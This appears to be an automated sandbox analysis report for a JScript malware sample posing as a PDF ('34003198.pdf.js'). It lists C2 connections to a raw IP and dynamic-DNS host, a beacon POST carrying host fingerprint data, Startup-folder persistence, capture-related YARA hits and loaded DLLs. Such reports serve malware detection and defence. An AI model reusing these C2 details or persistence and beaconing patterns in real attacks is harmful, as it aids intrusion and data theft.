                        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.71.108
                        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.71.108
                        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.71.108
                        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.71.108
                        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.71.108
                        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.71.108
                        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.71.108
                        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.71.108
                        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.71.108
                        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.71.108
                        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.71.108
                        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.71.108
                        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.71.108
                        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.71.108
                        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.71.108
                        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.71.108
                        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.71.108
                        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.71.108
                        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.71.108
                        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.71.108
                        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.71.108
                        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.71.108
                        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.71.108
                        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.71.108
                        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.71.108
                        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.71.108
                        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.71.108
                        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.71.108
                        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.71.108
                        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.71.108
                        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.71.108
                        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.71.108
                        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.71.108
                        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.71.108
                        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.71.108
                        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.71.108
                        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.71.108
                        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.71.108
                        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.71.108
                        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.71.108
                        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.71.108
                        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.71.108
                        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.71.108
                        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.71.108
                        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.71.108
                        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.71.108
                        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.71.108
                        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.71.108
                        Source: unknownTCP traffic detected without corresponding DNS query: 94.156.71.108
                        Source: unknownDNS traffic detected: queries for: jemyy.theworkpc.com
                        Source: unknownHTTP traffic detected: POST /Vre HTTP/1.1Accept: */*User-Agent: JUNE_B81A4609\user-PC\user\Microsoft Windows 10 Pro\Windows Defender\\YES\FALSE\Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateHost: jemyy.theworkpc.com:5401Content-Length: 0Connection: Keep-AliveCache-Control: no-cache
                        Source: wscript.exe, 00000002.00000003.1894927688.0000020BE1CC4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1894678392.0000020BE1CC2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1895136067.0000020BE1CCA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1894678392.0000020BE1D09000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1895136067.0000020BE1D09000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.2075840679.00000221C10A2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000006.00000003.2074574369.00000221C107D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.156.71.108/
                        Source: wscript.exe, 00000006.00000003.2075840679.00000221C10A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.156.71.108/&
                        Source: wscript.exe, 00000002.00000003.1894927688.0000020BE1CC4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1894678392.0000020BE1CC2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1895136067.0000020BE1CCA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.156.71.108/3a
                        Source: wscript.exe, 00000006.00000003.2074574369.00000221C107D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.156.71.108/BootDeve
                        Source: wscript.exe, 00000006.00000003.2074574369.00000221C107D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.156.71.108/nPrevention_Q
                        Source: wscript.exe, 00000006.00000003.2074574369.00000221C107D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.156.71.108:1604/is-ready
                        Source: wscript.exe, 00000002.00000003.1894450811.0000020BE1EEA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1895295189.0000020BE1FDC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.156.71.108:1604/is-ready.mui
                        Source: wscript.exe, 00000002.00000003.1895073011.0000020BE1D16000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1894678392.0000020BE1D09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.156.71.108:1604/is-ready;M
                        Source: wscript.exe, 00000006.00000003.2074574369.00000221C11C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.156.71.108:1604/is-readyB
                        Source: wscript.exe, 00000006.00000003.2075840679.00000221C10A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.156.71.108:1604/is-readyS
                        Source: wscript.exe, 00000006.00000003.2075840679.00000221C10A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.156.71.108:1604/is-readyT
                        Source: wscript.exe, 00000006.00000003.2075840679.00000221C10A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.156.71.108:1604/is-readyY
                        Source: wscript.exe, 00000002.00000003.1895073011.0000020BE1D16000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1894678392.0000020BE1D09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.156.71.108:1604/is-readybM
                        Source: wscript.exe, 00000002.00000003.1895073011.0000020BE1D16000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1894678392.0000020BE1D09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.156.71.108:1604/is-readykM
                        Source: wscript.exe, 00000002.00000003.1895073011.0000020BE1D16000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1894678392.0000020BE1D09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.156.71.108:1604/is-readymM
                        Source: wscript.exe, 00000006.00000003.2075840679.00000221C10A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.156.71.108:1604/is-readyng
                        Source: wscript.exe, 00000002.00000003.1894678392.0000020BE1D20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.1895231999.0000020BE1D22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com

                        Key, Mouse, Clipboard, Microphone and Screen Capturing

                        barindex
                        Source: Yara matchFile source: amsi64_4108.amsi.csv, type: OTHER
                        Source: Yara matchFile source: amsi64_3168.amsi.csv, type: OTHER
                        Source: Yara matchFile source: amsi64_3052.amsi.csv, type: OTHER
                        Source: Yara matchFile source: amsi64_2108.amsi.csv, type: OTHER
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 00000000.00000003.1717094086.00000204EDD11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000003.2052217166.000001B0667E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.1732635440.00000204E96D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000003.1895477782.0000020BE1A81000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000003.2075840679.00000221C10A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.1732046092.00000204E96D3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000003.2044832701.000001B066B5B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000003.1946740186.00000221C1074000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000003.1948124676.00000221C10C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000003.1756338470.0000020BE1DFB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.1716943117.00000204EE000000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000003.1939972889.00000221C11A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000003.1895073011.0000020BE1D16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000003.1894450811.0000020BE1EEA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.1717820374.00000204ED0E4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.1733013257.00000204E96D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000003.1961308985.0000020BE1EEA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000003.1894678392.0000020BE1D09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.1707066216.00000204EDF11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.1734499646.00000204E96DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000003.2051877056.000001B066C4A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000003.1939694643.00000221C0FD1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000003.2074574369.00000221C10A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000003.2053586111.000001B065B93000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.1716028940.00000204EE000000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000003.2051515691.000001B066DEF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.1733327075.00000204E96DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.1734834487.00000204E96DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000003.2052217166.000001B066887000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000003.1894927688.0000020BE1D09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.1707419041.00000204EDF11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000003.1899732633.0000020BE1EEA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.1716743000.00000204EE31A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000003.1707269284.00000204EE0E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 4108, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 3168, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 3052, type: MEMORYSTR

                        System Summary

                        barindex
                        Source: 34003198.pdf.jsInitial sample: Suspicious string win32_ D2LUMZJF
                        Source: C:\Windows\System32\wscript.exeCOM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}Jump to behavior
                        Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                        Source: C:\Windows\System32\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}Jump to behavior
                        Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}Jump to behavior
                        Source: C:\Windows\System32\wscript.exeCOM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000}Jump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\bCdHGOcGLp.js"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\34003198.pdf.js"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\bCdHGOcGLp.js"
                        Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" //B "C:\Users\user\AppData\Roaming\34003198.pdf.js"
                        Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" //B "C:\Users\user\AppData\Roaming\34003198.pdf.js"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\bCdHGOcGLp.js"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\bCdHGOcGLp.js"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\34003198.pdf.js"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\bCdHGOcGLp.js"Jump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\34003198.pdf.js"Jump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\bCdHGOcGLp.js"Jump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\bCdHGOcGLp.js"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\bCdHGOcGLp.js"Jump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\34003198.pdf.js"Jump to behavior
                        Source: 34003198.pdf.jsInitial sample: Strings found which are bigger than 50
                        Source: classification engineClassification label: mal100.troj.expl.evad.winJS@17/6@1/2
                        Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\bCdHGOcGLp.jsJump to behavior
                        Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\34003198.pdf.js"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\bCdHGOcGLp.js"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\34003198.pdf.js"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\bCdHGOcGLp.js"
                        Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" //B "C:\Users\user\AppData\Roaming\34003198.pdf.js"
                        Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" //B "C:\Users\user\AppData\Roaming\34003198.pdf.js"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\bCdHGOcGLp.js"
                        Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\bCdHGOcGLp.js"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\34003198.pdf.js"
                        Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bCdHGOcGLp.js"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\bCdHGOcGLp.js"Jump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\34003198.pdf.js"Jump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\bCdHGOcGLp.js"Jump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\bCdHGOcGLp.js"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\bCdHGOcGLp.js"Jump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\34003198.pdf.js"Jump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msdart.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msdart.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: napinsp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: pnrpnsp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wshbth.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: nlaapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: winrnr.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: napinsp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: pnrpnsp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wshbth.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: nlaapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: winrnr.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msdart.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
